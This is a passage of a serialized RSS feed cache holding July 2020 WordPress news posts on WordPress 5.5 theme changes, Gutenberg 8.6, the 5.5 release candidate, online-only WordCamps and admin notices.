breaking changes.</p>\n\n\n\n<p>For the most part, WordPress 5.5 will introduce new features that theme developers can begin to add to their themes. However, the two biggest changes that could negatively impact their themes will be automatic updates and direct HTML changes to the custom logo output.</p>\n\n\n\n<p>Outside of the new features and changes, theme authors should catch up on our <a href=\"https://wptavern.com/tag/gutenberg\">coverage of the Gutenberg plugin</a> and test against its updates that are being merged into core WordPress.</p>\n\n\n\n<h2>Auto Updates</h2>\n\n\n\n<p class=\"has-drop-cap\">WordPress 5.5 will finally introduce <a href=\"https://wptavern.com/automatic-theme-and-plugin-updates-slated-for-wordpress-5-5\">automatic updates for plugins and themes.</a> It is a long-awaited feature and should be a good thing in terms of keeping end-users updated and running what is usually the most secure version of their extensions. However, the big downside to automatic updates is that most themes and plugins will not have the same level of quality control as core WordPress receives. Even the best development companies might have only a few people looking over the code.</p>\n\n\n\n<p>On the flip-side, the automatic updates feature means that theme authors can push fixes out to end-users much more quickly.</p>\n\n\n\n<p>The big thing is that theme developers need to be aware that users will be enabling automatic updates. For some, this might not mean changing anything with their release cycles. For others, it might mean tacking on some extra time to ensure that extra quality control is in place. The success of automatic updates lies directly on the shoulders of the plugin and theme authors. It is a huge responsibility that should not be taken lightly. WordPress is placing a lot of trust in its development community to get this right.</p>\n\n\n\n<h2>HTML Change for Custom Logos</h2>\n\n\n\n<p class=\"has-drop-cap\">As part of an <a href=\"https://core.trac.wordpress.org/ticket/37011\">accessibility-related ticket</a> for WordPress 5.5, the core <code>get_custom_logo()</code> and <code>the_custom_logo()</code> functions will no longer <a href=\"https://make.wordpress.org/core/2020/07/28/themes-changes-related-to-get_custom_logo-in-wordpress-5-5/\">output a link around the logo image</a> when viewing the site homepage. This change was made because the link itself points to the homepage by default and is unnecessary in that context.</p>\n\n\n\n<p>Right now, there are 183 themes in the official theme directory that target the link in their CSS. This does not necessarily mean that all 183 themes will be broken upon update. However, it likely means that some of them will need a tweak or two.</p>\n\n\n\n<p>Theme authors are encouraged to target the <code>.custom-logo-link</code> class instead of any particular HTML element. The new change will add a <code>&lt;span&gt;</code> element rather than an <code>&lt;a&gt;</code> element on the homepage. Both will use the same class.</p>\n\n\n\n<h2>Block Patterns Have Arrived</h2>\n\n\n\n<p class=\"has-drop-cap\">It is no secret that I am <a href=\"https://wptavern.com/block-patterns-will-change-everything\">downright giddy</a> about the prospect of theme designers being loosed upon the world, allowing their talents to shine via block patterns.  Patterns have been one of the missing features since the initial launch of the Gutenberg project. For theme authors, they represent that missing link between designing unique &ldquo;templates&rdquo; or &ldquo;sections&rdquo; and providing end-users a means to add them to their sites.</p>\n\n\n\n<p>Block patterns are essentially groups of pre-configured blocks that users can insert into their posts or pages at the click of a button. The beauty of the system is that theme authors can design whatever patterns their hearts desire and make them easily available to their users. No need for complicated theme settings. No lengthy tutorials explaining how to recreate the demo. Design something in the block editor. Register it as a pattern. Let users insert it into a post and rejoice.</p>\n\n\n\n<p>This is an opportunity that theme authors have never had before. It is an opportunity to create beautiful designs without having to worry about overcomplicating it for the average user. It is a pivotal moment in WordPress theme design history. Theme authors have the chance to push the system and see what WordPress and its block editor are truly capable of.</p>\n\n\n\n<p><em>Building a restaurant theme?</em> Provide users with multiple food menu patterns. <em>Creating something for novelists or other book authors?</em> Give users some layout options for showcasing their books.</p>\n\n\n\n<p>The <a href=\"https://developer.wordpress.org/block-editor/developers/block-api/block-patterns/\">block patterns API</a> removes many prior limits to what theme authors could realistically do. Now, it&rsquo;s time for those theme authors to take charge.</p>\n\n\n\n<h2>Line Heights and Custom Units</h2>\n\n\n\n<p class=\"has-drop-cap\">The block editor has two new tools for end-users to take advantage of: <a href=\"https://make.wordpress.org/core/2020/07/27/new-block-tools-on-wordpress-5-5/\">custom line-heights and custom units</a>. Theme authors can opt into allowing users to edit the line-height of paragraphs and headings with the <code>custom-line-heights</code> theme support flag. They can also allow users to switch between various units, such as when defining the Cover block&rsquo;s height, with the <code>custom-units</code> flag. In addition to pixels, themes can define which units are supported.</p>\n\n\n\n<p>Allowing users to customize the line-height value for text can be tricky business. There are some situations where it is warranted. However, for theme authors who prefer to maintain a strict vertical rhythm, this could lead to disaster. This will likely come down to a personal choice for developers based on what type of theme they are building.</p>\n\n\n\n<h2>Accessible Widgets Navigation</h2>\n\n\n\n<p class=\"has-drop-cap\">Starting with WordPress 5.5, theme authors will be able to opt into outputting more <a href=\"https://make.wordpress.org/core/2020/07/09/accessibility-improvements-to-widgets-outputting-lists-of-links-in-5-5/\">accessible widgets</a>. By default, widgets that display unordered lists do so without any context. This can make it difficult for those using assistive technologies to navigate the site.</p>\n\n\n\n<p>Theme authors can now add <code>navigation-widgets</code> to the HTML5 theme supports array to add the new markup. WordPress will then wrap all core widgets with a <code>&lt;nav&gt;</code> element and an <code>aria-label</code> based on the widget title.</p>\n\n\n\n<p>This will not affect widgets from third-party plugins. Plugin authors should reevaluate their widgets to determine if they want to support this feature.</p>\n\n\n\n<h2>Template Functions Updates</h2>\n\n\n\n<p class=\"has-drop-cap\">WordPress is tacking on some nice features for its templating functions in the upcoming release. The first major change is that theme authors can pass data to template files. We have <a href=\"https://wptavern.com/theme-authors-can-pass-data-to-template-files-in-wordpress-5-5\">previously covered</a> this story on the Tavern. This feature, while years late, should still be useful for more complex theming setups and allow developers to bypass odd workarounds or in-house solutions.</p>\n\n\n\n<p>Template-loading functions, such as <code>get_template_part()</code> and others, will also <a href=\"https://core.trac.wordpress.org/ticket/40969\">return a value</a> in WordPress 5.5. If the template is not found, the function will return a <code>false</code> value. Otherwise, it will return <code>void</code>. This will be helpful in situations where theme authors need to run a conditional to check if a template exists.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2020 22:05:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: Gutenberg 8.6 Adds Cover Block Video Positioning and Updates Block Patterns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102512\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:215:\"https://wptavern.com/gutenberg-8-6-adds-cover-block-video-positioning-and-updates-block-patterns?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-8-6-adds-cover-block-video-positioning-and-updates-block-patterns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4671:\"<p class=\"has-drop-cap\">Gutenberg 8.6 <a href=\"https://make.wordpress.org/core/2020/07/22/whats-new-in-gutenberg-july-22/\">landed quietly last week</a>. Much of the focus right now is ironing out the remaining bugs for WordPress 5.5 during its beta cycle. However, that does not mean the Gutenberg project has come to a complete halt in terms of new features. The team is marching forward with extra goodies for those who use the plugin.</p>\n\n\n\n<p>The latest update of the plugin did not cover as much ground as normal, but it does include an enhancement for the Cover block when using a video background and several updates to block patterns.</p>\n\n\n\n<p>The primary focus for version 8.6 was squashing bugs. The development team addressed over three dozen of them while correcting a handful of performance issues. While new features and enhancements from 8.6 onward are not expected in the upcoming WordPress 5.5, most bug fixes should be included.</p>\n\n\n\n<h2>Focal Point Selector for Video Covers</h2>\n\n\n\n<img />Selecting a focal point for a video background.\n\n\n\n<p class=\"has-drop-cap\">The Cover block has long allowed users to pick a focal point for background images. However, this feature was missing when users added a background video to the block. As of version 8.6, that is no longer the case. Both image and video backgrounds should work in much the same way.</p>\n\n\n\n<p>Gutenberg now has a new &ldquo;<a href=\"https://github.com/WordPress/gutenberg/pull/22531\">Focal point picker</a>&rdquo; option located under the &ldquo;Media settings&rdquo; tab when adding a video background. Users can select the focal point by dragging the circle icon in the video box or hardcode left and top percentage values in the input fields below it.</p>\n\n\n\n<p>This is not a particularly exciting development for most Gutenberg users.  Self-hosting video is not cheap and remains unused for most. However, for those who do use video backgrounds, it is one of those nice-to-have features that is there when needed.</p>\n\n\n\n<h2>Updated Block Patterns</h2>\n\n\n\n<img />Inserting the updated quote block pattern.\n\n\n\n<p class=\"has-drop-cap\">The Gutenberg team updated several of the existing block patterns. For the most part, the pattern updates were minor cosmetic changes, tweaks that improve the overall design. The button-related patterns received simple changes, such as new <a href=\"https://github.com/WordPress/gutenberg/pull/23848\">text labels</a> and <a href=\"https://github.com/WordPress/gutenberg/pull/23849\">colors</a>. The developers also changed the colors and text of the large header patterns.</p>\n\n\n\n<p>The team moved the header above the columns in the <a href=\"https://github.com/WordPress/gutenberg/pull/23853\">two columns text pattern</a> and changed the text to make the columns appear equal height by default. It is a poor use of textual columns, which would ideally be handled with CSS instead so that it works appropriately across screen sizes. Perhaps it would be better to have a &ldquo;Text Columns&rdquo; block in the long run.</p>\n\n\n\n<p>The nicest block pattern update was for the <a href=\"https://github.com/WordPress/gutenberg/pull/23881\">quote pattern</a>. It now has an image at the top and a separator at the bottom. It is akin to a single testimonial, which is more of a <em>pattern</em> than a basic quote.</p>\n\n\n\n<p>Theme authors can also <a href=\"https://github.com/WordPress/gutenberg/pull/24042\">remove support</a> for the core block patterns with a single line of code: <code>remove_theme_support( \'core-block-patterns\' )</code>. This does not drop support for patterns altogether. For example, patterns added by plugins or the theme will still appear in the inserter.</p>\n\n\n\n<h2>Site Icon Used in Fullscreen Mode</h2>\n\n\n\n<img />Site icon appears in top left in fullscreen mode.\n\n\n\n<p class=\"has-drop-cap\">When writing in fullscreen mode, the &ldquo;back to posts&rdquo; link has utilized the WordPress logo in the past. In version 8.6, the user&rsquo;s custom <a href=\"https://github.com/WordPress/gutenberg/pull/22952\">site icon will take its place</a>. However, this will only happen if the user has uploaded an icon via the customizer.</p>\n\n\n\n<p>I am unsure how I feel about this change. In practice, it almost feels like clicking the icon should take me to the front end of the site instead of the post management screen. At least with the WordPress icon, it felt like it was pointing toward an admin-side screen instead. For my workflow, I would rather see this link/icon replaced with a button that toggles between fullscreen and normal mode, popping the admin menu back into place rather than departing the editing screen altogether.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Jul 2020 20:59:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"WordPress.org blog: WordPress 5.5 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8732\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2020/07/wordpress-5-5-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2968:\"<p>The first release candidate for WordPress 5.5 is now available!</p>\n\n\n\n<p>This is an important milestone in the community&#8217;s progress toward the final release of WordPress 5.5. </p>\n\n\n\n<p>“Release Candidate” means that the new version is ready for release, but with millions of users and thousands of plugins and themes, it’s possible something was missed. WordPress 5.5 is slated for release&nbsp;on&nbsp;<strong>August 11, 2020</strong>, but we need&nbsp;<em>your</em>&nbsp;help to get there—if you haven’t tried 5.5 yet,&nbsp;<strong>now is the time</strong>!</p>\n\n\n\n<p>You can test the WordPress 5.5 release candidate in two ways:</p>\n\n\n\n<ul><li>Try the&nbsp;<a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a>&nbsp;plugin (choose the “bleeding edge nightlies” option)</li><li>Or&nbsp;<a href=\"https://wordpress.org/wordpress-5.5-RC1.zip\">download the release candidate here (zip)</a>.</li></ul>\n\n\n\n<p>Thank you to all of the contributors who tested the&nbsp;Beta releases and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>What’s in WordPress 5.5?</h2>\n\n\n\n<p>WordPress 5.5 has lots of refinements to polish the developer experience. To keep up, subscribe to the&nbsp;<a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a>&nbsp;and pay special attention to the&nbsp;<a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developer notes</a>&nbsp;tag for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.5 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the readme file to 5.5. If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>,&nbsp;so those can be figured out before the final release.</p>\n\n\n\n<p>The&nbsp;WordPress 5.5 Field Guide, due very shortly, will give you a more detailed dive into the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English?&nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a>&nbsp;This release also marks the <a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a>&nbsp;point of the 5.5 release schedule.</p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">fill one on WordPress Trac</a>, where you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Jul 2020 19:08:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"WPTavern: WordPress to Stick with Online-Only Meetups and WordCamps for Remainder of 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102462\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:223:\"https://wptavern.com/wordpress-to-stick-with-online-only-meetups-and-wordcamps-for-remainder-of-2020?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-to-stick-with-online-only-meetups-and-wordcamps-for-remainder-of-2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6256:\"<img />photo credit: <a href=\"https://stocksnap.io/photo/macbook-computer-JPZDGEMDH3\">Burst</a>\n\n\n\n<p>The WordPress Community Team has officially updated its guidelines for WordCamps to be online-only events for the remainder of 2020. The six WordCamps on the <a href=\"https://central.wordcamp.org/schedule/\">schedule</a> through the end of the year were already planning on using an online format but the guidelines also include local <a href=\"https://make.wordpress.org/community/events/online/\">meetups</a>. </p>\n\n\n\n<p>&ldquo;The team acknowledges that this is not easy for the community that has been heavily based on in-person events and encounters,&rdquo; Timi Wahalahti said in the <a href=\"https://make.wordpress.org/community/2020/07/27/in-person-events-in-rest-of-year-2020/\">announcement</a>. &ldquo;Unfortunately, the global coronavirus situation does not seem to be slowing down to a level that would allow us organizing in-person events safely at this time.&rdquo;</p>\n\n\n\n<p>The guidelines will be re-evaluated in the first quarter of 2021, but some organizers are already planning for online events next year. WordCamp Europe 2021 is the first WordPress event to <a href=\"https://wptavern.com/wordcamp-europe-goes-virtual-for-2021-in-person-conference-to-resume-2022\">go virtual for the coming year</a>, with the in-person event resuming in 2022.</p>\n\n\n\n<p>Moving what was once a vibrant in-person gathering to a two-dimensional online format is a challenging endeavor, especially when the world is suddenly awash in online events competing for attention. Making virtual events stand out from the crowd is a new marketing challenge. </p>\n\n\n\n<p>There is something about the magic of WordCamps that gives momentum to ideas and collaboration. While you cannot replicate the chance meetings in the hallway and the priceless conversations over long dinners, online events have the benefit of being more geographically inclusive. The constraints of the pandemic are also challenging our assumptions about how online gatherings are supposed to work.</p>\n\n\n\n<h2>WordPress Community Team to Explore New Event Formats, Redefine Relationships with Sponsors, Temporarily Cancel Swag Spending</h2>\n\n\n\n<p>The necessity for virtual events has inspired discussion around some new event formats, including a new <a href=\"https://make.wordpress.org/community/2020/07/23/building-community-beyond-events/\">proposal</a> that decouples online events from geography. WordPress Community manager Hugh Lashbrooke described how events might explore combining synchronous discussions with previously recorded workshops:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>What if we blended those two elements into a program that provides the flexibility of online content, with the value and sense of community that comes with learning together?</p><p>We could publish workshops in a central location (on&nbsp;<code>wordpress.org</code>, for better visibility and reach) and then invite learners to join live discussion groups that cater to different timezones. This &ldquo;<a href=\"https://en.wikipedia.org/wiki/Flipped_classroom\">flipped classroom</a>&rdquo; model allows people to learn at their convenience, and then come together for additional development.&nbsp;</p></blockquote>\n\n\n\n<p>Lashbrooke suggested the workshops could be designed by people who would otherwise be speaking WordCamps and could possibly source content from WordPress.tv or talks that have been given at online meetups.</p>\n\n\n\n<p>&ldquo;There is also potential for longer courses, composed of multiple workshops, and a group that meets repeatedly over time,&rdquo; Lashbrooke said.</p>\n\n\n\n<p>So far the suggestions in  the comments include introductory workshops for WordPress. These would be timely for newcomers who have recently lost work and are looking to improve their online resumes or portfolios, or start up a new business. Beginner workshops have strong outreach potential if promoted outside of the WordPress community.</p>\n\n\n\n<p>During the first half of the year, the Community Team began transitioning to facilitating the needs of online events and have continued to work tirelessly to find ways for people to connect. In a recent <a href=\"https://make.wordpress.org/community/2020/07/23/moving-forward-with-online-events/\">update</a>, WordPress community organizer Andrea Middleton explained that changes are coming for future online events, which may adopt another name instead of using &ldquo;WordCamp.&rdquo;</p>\n\n\n\n<p>Due to the<a href=\"https://make.wordpress.org/community/2020/05/11/financial-update-on-wordpress-community-programs/\"> financial position</a> of WordPress Community Support PBC (WPCS), the community team is ending programmatic support for online AV vendor expenses. WordCamps that are not yet on the schedule will be encouraged to get sponsorships if they require the use of a professional AV vendor.</p>\n\n\n\n<p>&ldquo;Likewise, we have paused plans to spend money on sending swag, T-shirts, or other typical WordCamp collateral,&rdquo; Middleton said. &ldquo;It&rsquo;s important to change our frame of reference for what&rsquo;s necessary to make online events, away from the WordCamp model. Just because we did things a certain way for WordCamps, doesn&rsquo;t mean it&rsquo;s a high priority for online events.&rdquo;</p>\n\n\n\n<p>Sponsorships are also being re-examined, as online events haven&rsquo;t quite been able to deliver the same value to sponsors that traditional events did.</p>\n\n\n\n<p>&ldquo;The value proposition of online sponsor booths is shaky, and we&rsquo;ve always prided ourselves in partnering with our sponsors,&rdquo; Middleton said. &ldquo;Looking ahead, we must examine how much funding we&nbsp;<strong>need</strong>&nbsp;to create events that meet the goals of the team, and let that determine how to best coordinate with our community sponsors to deliver value and further our mission.&rdquo; </p>\n\n\n\n<p>The potential for in-person events for the coming year is still uncertain at this point, in the absence of a vaccine ready for commercial distribution. WordPress&rsquo; global sponsorship program has been temporarily suspended and the Community Team plans to work with global sponsors later this year to make a plan for 2021.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Jul 2020 01:06:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Are Plugin Authors to Blame for the Poor Admin Notices Experience?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102405\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:195:\"https://wptavern.com/are-plugin-authors-to-blame-for-the-poor-admin-notices-experience?utm_source=rss&utm_medium=rss&utm_campaign=are-plugin-authors-to-blame-for-the-poor-admin-notices-experience\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6619:\"<p class=\"has-drop-cap\">Last Thursday, Vova Feldman published an article asking that we <a href=\"https://freemius.com/blog/wordpress-admin-notices/\">stop blaming plugin authors</a> for the plethora of admin notices that users are bombarded with each day. <em>The real culprit?</em> The lack of a notifications mechanism in WordPress core.</p>\n\n\n\n<p>Feldman&rsquo;s post was prompted by a <a href=\"https://twitter.com/scottbolinger/status/1280567235006742528\">tweet</a> in which Scott Bolinger called out plugin authors for letting admin notices get out of control:</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Good lord WordPress plugin authors, this is out of control. <a href=\"https://t.co/0S42908C5T\">pic.twitter.com/0S42908C5T</a></p>&mdash; Scott Bolinger (@scottbolinger) <a href=\"https://twitter.com/scottbolinger/status/1280567235006742528?ref_src=twsrc%5Etfw\">July 7, 2020</a></blockquote>\n</div>\n\n\n\n<p>Feldman argues that laying the blame on plugin authors is the wrong way to look at the issue. While I agree that the underlying problem lies with WordPress, plugin authors have played their part in creating an atmosphere where they have become the scapegoat for everything wrong with the system.</p>\n\n\n\n<p>I have developed plugins since a fateful day in April 2007 in which I released a plugin that simply listed the current page&rsquo;s subpages. I have worked on 100s of plugins for clients and public release since then. In that time, I have maybe added a custom admin notice two times and only when the plugin had a major change, such as a database update. I reserved such notices for the OMGBBQ-very-important-you-need-to-read-this type of stuff. I considered it my duty to create an experience in which the user did not have to dismiss a notice every time one of my plugins received an update.</p>\n\n\n\n<p>This was not because I was cognizant of the growing issue of dozens of notices on some sites or how often users were being overwhelmed with them. For many years, I worked within a bubble where I simply focused on creating what I considered an ideal experience for my users. I always thought the admin notices system created an abysmal experience. It did not make sense to use it more than necessary.</p>\n\n\n\n<p>On the other hand, there were likely a few times over the years where I should have added some sort of notices for changes. Instead, I avoided doing so altogether because WordPress lacked a notifications system. I missed some good opportunities for communication.</p>\n\n\n\n<p>To a large extent, the issue stems from this lack of a proper notification system. However, plugin authors have perpetuated this broken system by continuing to use it when unnecessary. They have used it as a billboard to place their <a href=\"https://wptavern.com/black-friday-banner-gone-wrong-advertising-in-free-plugins\">holiday ads</a>. They have used it to upsell commercial versions of their products and services while prompting users for a five-star rating. There is plenty of blame to go around.</p>\n\n\n\n<p>Instead of placing blame, we should start asking what tools would solve problems for developers.</p>\n\n\n\n<h2>The Need for a Better System</h2>\n\n\n\n<p class=\"has-drop-cap\">Technically, WordPress simply has a hook and a set of common classes that developers can use in their HTML to provide some different colors for notices. There is no API, and without an API, it is impossible for even third-party plugin developers to even try their hands at creating various solutions.</p>\n\n\n\n<p>The closest thing WordPress has to an API is a little-known project from the Themes Team that provides a <a href=\"https://github.com/WPTT/admin-notices\">standardized method for theme authors</a> to add notices. However, the project covers only one aspect of admin notices, which is to create a consistent UI.</p>\n\n\n\n<p>The admin notice issue cannot be properly addressed without identifying the problems that plugin authors have tried to solve within the system, which at least includes the following:</p>\n\n\n\n<ul><li>User-oriented notifications, generally appearing after a user action.</li><li>Advertising commercial products and services.</li><li>Calls for plugin feedback or star ratings.</li></ul>\n\n\n\n<p>One of the primary issues with the current notification system is that it was created for the first item in that list. The other two items are not necessarily bad things. They are just poor usages of the system in place. However, there is no other standard method to handle those scenarios.</p>\n\n\n\n<p>Advertising is something we all must deal with in some form or fashion. I am unsure if there could or even should be a standard API for advertising. An outright ban of ads in the admin notice area could create a beast of its own, forcing plugin authors to come up with more obtrusive forms of advertising in other areas of the admin. I want to support advertising but not when that advertising wiggles its way to the top of every admin screen.</p>\n\n\n\n<p>WordPress provides no easy way for end-users to rate or review plugins from their admin interfaces. Having an easy way to provide direct feedback would be immensely helpful for both users and developers. While I am certain many people would argue against such integration with the WordPress.org site (there are arguments against any external integration out of the box), ratings and reviews would require an explicit opt-in from end-users because they would need an account on WordPress.org.</p>\n\n\n\n<p>Advertising and plugin feedback should not be a part of a discussion on admin notices. However, reality dictates that they are integral to the conversation.</p>\n\n\n\n<p>The first order of business must be to create a new notification system from the ground up. It should provide a standard API for plugin authors while handing over full management capabilities to the site owners. Users should be able to disable notices altogether or even enable/disable notices on a per-plugin basis. <em>Notice that a particular plugin author provides useless notices?</em> Well, just disable notices from that plugin. The author lost their privileges.</p>\n\n\n\n<p>From that point, we can let the progress drive the discussion on what to do about advertising and calls for feedback. A new system may shift them to a new screen &mdash; out of sight out of mind &mdash; but not make those problems disappear.</p>\n\n\n\n<p>More than anything, it is time for a champion.  The project does not get done without someone who will pave the path forward and earn the green light for a new notifications system in WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Jul 2020 21:40:41 